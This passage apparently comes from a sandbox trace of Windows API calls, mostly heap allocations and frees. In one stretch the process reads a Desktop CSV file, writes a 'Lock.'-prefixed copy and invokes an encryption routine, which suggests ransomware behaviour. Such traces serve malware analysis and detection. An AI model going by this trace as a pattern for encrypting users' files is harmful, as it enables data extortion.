dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0204.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0204.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0204.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0204.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0204.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0204.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0204.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0204.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0204.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0204.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0204.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0204.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0204.643] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0204.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0204.643] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.643] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.644] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0204.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0204.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0204.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0204.646] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/pGS8H.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\pgs8h.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0204.646] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.647] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0204.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0204.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0204.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0204.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0204.648] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0204.648] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.pGS8H.csv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.pgs8h.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0204.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0204.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0204.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0204.650] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0204.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0204.651] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0204.651] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0204.655] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x50f1, lpOverlapped=0x0) returned 1 [0204.656] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0204.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0204.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0204.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f1) returned 0x2f24018 [0204.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0204.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0204.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0204.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0204.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0204.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0204.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0204.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0204.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f1) returned 0x2f39118 [0204.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0204.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.696] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0204.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0204.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0204.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0204.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f1) returned 0x2f24018 [0204.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0204.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0204.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0204.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0204.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0204.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.699] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0204.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0204.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0204.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0204.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0204.700] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0204.700] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0204.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0204.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0204.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f1) returned 0x2f24018 [0204.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0204.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0204.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0204.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0204.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0204.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0204.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0204.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f1) returned 0x2e80330 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0204.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0204.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0204.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0204.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0204.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0204.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0204.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0204.709] RtlAllocateHeap 